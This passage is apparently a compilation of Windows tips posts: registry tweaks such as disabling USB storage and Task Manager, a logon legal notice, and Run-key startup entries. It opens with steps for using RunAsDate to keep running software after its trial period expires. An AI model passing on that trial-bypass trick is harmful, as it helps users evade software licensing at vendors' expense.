2.Once the trial period expires, you must always run the software using RunAsDate. 3.After the trial period is expired, do not run the software(program) directly. If you run the software directly even once, this hack may no longer work. 4.It is better and safe to inject the date of the last day in the trial period. For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate Source: GH

If your PC has multiple users or you have your PC on a public place, then you can now display legal notice to every user before they log in to your PC. This legal notice will be displayed on the Logon screen at every startup just before the Desktop is loaded. Using this way, you can tell your friends or give a warning to the users about the DO’s and DON’ts in your computer when they use it in your absence. You can do this pretty easily just by using a small registry hack. Steps to Display Legal Notice on Startup: 1.Go to Start -> Run, type regedit and hit ENTER. 2.Navigate to the following key in the registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system 3.On the right side pane look for “legalnoticecaption“, double click on it and enter the desired Legal Notice Caption. 4.Next below this look for “legalnoticetext” and enter the desired Legal Notice Text. The legal notice text can be up to a page in its size so that it can include a set of do’s and dont’s for your computer. 5.After you do this just restart your computer and upon the next startup you can see the legal notice information for your computer. This trick works on Windows XP, Vista and Windows 7 as well.

Microsoft Windows offers a feature-rich interface and several customization options that make it one of the most user friendly operating systems in the world. However, computer geeks would still love to hack the Windows Registry so as to add more extra features and functionalities to their operating system. If you’re one such geek who would like to customize Windows in your own way, here is a list of 8 interesting registry hacks that you need to try: 1. Disable USB Devices: Disabling USB ports can be a smart idea to add security to the computer. This can be really handy if the computer is on a public place where the chances of virus and other malware infection is really high. You can easily disable access to USB ports with the following registry hack: 1.Open the Registry Editor (Start -> Run -> Type regedit and hit Enter) 2.In the registry, navigate to the following key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor 3.In the right-side pane, double-click on “Start”. 4.In the “Value data” field enter 4 and click on “OK”. 5.Close the Registry Editor and reboot. 2. Disable Notification Balloons in Windows 7 and Vista: You can now disable the annoying notification balloons that keeps popping up frequently with warning messages and reminders. Here is a step-by-step procedure to do that: 1.Open the Registry Editor and navigate to the following key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced 2.Right-click on the right-hand pane, and create a new “DWORD”. 3.Rename it to EnableBalloonTips, double-click on it and set the “Value data” to 0. Reboot the computer to see the changes in effect. 3. Add “Recycle Bin” to My Computer in Windows 7 and Vista: Would you like to add the “Recycle Bin” icon to My Computer so that you need not go back to the desktop to access it when required? Well, here is how you can do that: 1.Open the Registry Editor and navigate to the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace 2.Right-click on “NameSpace” and select New -> Key. Name the key with the following name: {645FF040-5081-101B-9F08-00AA002F954E} 3.Now, open “My Computer” and hit F5 to refresh the screen. This should show up the “Recycle Bin” icon. 4. Disable the Windows Task Manager: 1.Open the Registry Editor and navigate to the following key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies 2.Right-click on “Policies”, select New -> Key and name the key as System. 3.If you are on Windows XP, you need not create the new key “System” as it is already present in it. So, you can directly navigate to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System in the Step-1 itself. 4.Right-click on “System”, create a new “DWORD” and name it to DisableTaskMgr. 5.Double-click on the DWORD “DisableTaskMgr” and set the “Value data” to 1 (0=Enable, 1=Disable). 6.To enable the Task Manager, Set the “Value data” back to 0. 5. Change the Registered Owner and Organization Name: Here is a simple hack to change the name of the Registered owner on your computer: 1.Open the Registry Editor and navigate to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion 2.On the right-side pane, find the keys RegisteredOwner and RegisteredOrganization. Double-click on them to change the names to whatever you want. 3.To see the changes, right-click on “My Computer” and select “Properties”. 6. Add Programs to Windows Startup: You can now add your favorite programs to Windows Startup without the need for using the start-up folder. Here is a way to do this: 1.Open the Registry Editor and navigate to the following key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 2.On the right-side pane, create a new “String Value” and rename it to the name of the program that you want to add (you can give any name, it doesn’t matter). 3.Double-click on the “String Value”, in the “Value data” field add the path of the executable program that has to execute at startup. 4.Reboot the computer to see the changes in effect. 7. Add “Pin to Start Menu” Option for Folders in Windows 7 and Vista: Ever wanted to pin a folder to the start menu to gain faster access to it? Well, it is possible to add the “Pin to Start Menu” option so that you can plug your favorite folders to Start Menu. Here is a step-by-step procedure: 1.Open the Registry Editor and navigate to: HKEY_CLASSES_ROOT\Folder\shellex\ContextMenuHandlers 2.Right-click on “ContextMenuHandlers” and select New -> Key. Name the key as follows: {a2a9545d-a0c2-42b4-9708-a0b2badd77c8} 3.Now, whenever you want to add a folder to Start Menu, hold down the Shift key and right-click on the folder. You should see the “Pin to Start Menu” option in the context menu”. 8. Disable “Aero Shake” in Windows 7: One of the new additions to Windows 7 is the “Aero Shake” feature using which it is possible to grab a window using its title bar and shake it. This will minimize all the other open windows if any. It is really a handy feature! However, if you ever wanted to disable this feature, here is a solution: 1.Open the Registry Editor and navigate to the following key: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows 2.Now, right-click on “Windows” key and create a new Key called Explorer. 3.Right-click on the “Explorer” key and create a new “DWORD” called NoWindowMinimizingShortcuts and set its value to 1. 4.Close the Registry Editor and reboot the computer to see the changes in effect. Source: GH